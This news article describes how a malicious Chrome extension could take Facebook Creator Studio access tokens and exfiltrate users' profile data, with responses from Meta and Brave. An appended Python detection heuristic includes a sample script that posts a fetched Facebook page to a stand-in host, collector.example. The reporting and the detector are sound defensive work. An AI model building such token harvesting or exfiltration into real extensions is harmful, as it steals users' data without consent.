Here's how a theoretical data theft could occur:

You create and release a seemingly innocent Chrome extension that can fetch access tokens from Facebook's Creator Studio.

Whenever a victim installs your Chrome extension and is signed into Facebook, the extension obtains one of these tokens on the victim's behalf to silently access their Facebook data via the social network's Graph API.

The extension then exfiltrates the victim's data to a remote server.

The ability to grab an access token from the Creator Studio provides a route for extensions to quietly, automatically harvest signed-in users' profile data without permission and without having to, say, scrape pages. The access token is obtained by fetching this page and extracting accessToken from the source.

In September 2018, Facebook acknowledged a security issue affecting almost 50 million accounts, which it attributed to miscreants stealing access tokens presented by its "View As" feature to allow people to see how their profiles look to others.

"This allowed them to steal Facebook access tokens which they could then use to take over people's accounts," explained Guy Rosen, who was VP of Product Management at the time and is now VP of Integrity at Meta. "Access tokens are the equivalent of digital keys that keep people logged in to Facebook so they don't need to re-enter their password every time they use the app."

The access token available through Creator Studio does not pose the same threat of account takeover as the "View As" token.

A Meta spokesperson told us via email that these sorts of tokens have legitimate uses and provide no access to data beyond what's available to an individual account holder. And Meta said there's no indication that the L.O.C. extension has been exfiltrating information from people's devices.

Nonetheless, the token does provide programmatic access to data about signed-in Facebook users without authorization or consent. It was this risk that prompted browser maker Brave to block the L.O.C. extension, until developer Loc Mai contacted Brave's development team. A Brave spokesperson said the company is working with the programmer to make some changes – likely a notification or permission prompt – so the extension is acceptable from a privacy and security standpoint.

And it's a risk that ought to concern Meta and its subsidiaries given Facebook's 2019 settlement of an FTC investigation that followed from the Cambridge Analytica scandal. As part of that deal, Facebook committed to limiting third-party access to user data.

Cambridge Analytica obtained people's Facebook profile information via a third-party quiz app that plugged into the social network. There are parallels here: you hope that a quiz app won't share your Facebook profile info with others, and you hope a Chrome extension avoids that, too.

Though Facebook vowed to put in place measures to prevent another Cambridge Analytica fiasco, the Creator Studio access tokens in the hands of a malicious and widely installed Chrome extension could lead to a repeat of history.

"Under the new framework required by the FTC, we'll be accountable and transparent about fixing old products that don't work the way they should and building new products to a higher standard," Facebook insisted when it promised to clean up data access nearly three years ago.

In an email to The Register, a Meta spokesperson said the company is dealing with these extensions but that requires the help of Google.

"The access tokens that these extensions request help creators and others to use our tools and products but aren't capable of accessing data beyond what people can do with their own account or what the session cookie on their browser already provides," Meta's spokesperson said in an email.
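A defender-side review heuristic for the scenario the article sketches, as an added example (not the article's, Meta's, Brave's or the L.O.C. extension's code): given an unpacked extension's manifest and script sources, it flags reach into facebook.com pages, handling of an accessToken, and requests to non-Facebook hosts. The sample manifest and scripts are constructed, and the first-party domain list is an assumption.

```python
import re
from urllib.parse import urlparse

FIRST_PARTY = ("facebook.com", "fb.com", "fbcdn.net")  # assumed first-party domains
URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""")
HOST_PERM_RE = re.compile(r"^(?:\*|https?)://(?:\*\.)?([^/*]+)/")

def _is_first_party(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in FIRST_PARTY)

def _perm_host(pattern):
    # Host of a manifest match pattern; "*" for all hosts; None for API names.
    if pattern in ("<all_urls>", "*://*/*"):
        return "*"
    m = HOST_PERM_RE.match(pattern)
    return m.group(1) if m else None

def assess_extension(manifest, scripts):
    """Flag the three ingredients of the scenario: reach into facebook.com pages,
    code that handles an accessToken, and requests to a host outside Facebook."""
    perms = list(manifest.get("host_permissions", [])) + list(manifest.get("permissions", []))
    for cs in manifest.get("content_scripts", []):
        perms += cs.get("matches", [])
    hosts = {p: _perm_host(p) for p in perms}
    fb_reach = [p for p, h in hosts.items() if h == "*" or (h and _is_first_party(h))]
    findings = []
    if fb_reach:
        findings.append("reaches facebook.com pages via " + ", ".join(fb_reach))
    token_refs, foreign_hosts = [], set()
    for name, src in scripts.items():
        if "accessToken" in src:
            token_refs.append(name)
        for url in URL_RE.findall(src):
            host = urlparse(url).hostname or ""
            if host and not _is_first_party(host):
                foreign_hosts.add(host)
    if token_refs:
        findings.append("handles accessToken in " + ", ".join(sorted(token_refs)))
    if foreign_hosts:
        findings.append("sends requests to non-Facebook hosts: " + ", ".join(sorted(foreign_hosts)))
    return findings

# Constructed sample extension, not any real extension's manifest or code.
SAMPLE_MANIFEST = {"manifest_version": 3,
                   "host_permissions": ["https://*.facebook.com/*", "https://collector.example/*"]}
SAMPLE_SCRIPTS = {
    "background.js": "fetch('https://www.facebook.com/creatorstudio').then(r => r.text())\n"
                     "  .then(src => fetch('https://collector.example/ingest', {method: 'POST', body: src}));",
    "graph.js": "// constructed placeholder: reads accessToken from the fetched page source",
}
```

All three findings together are the pattern worth escalating; any one alone is routine for a legitimate creator tool.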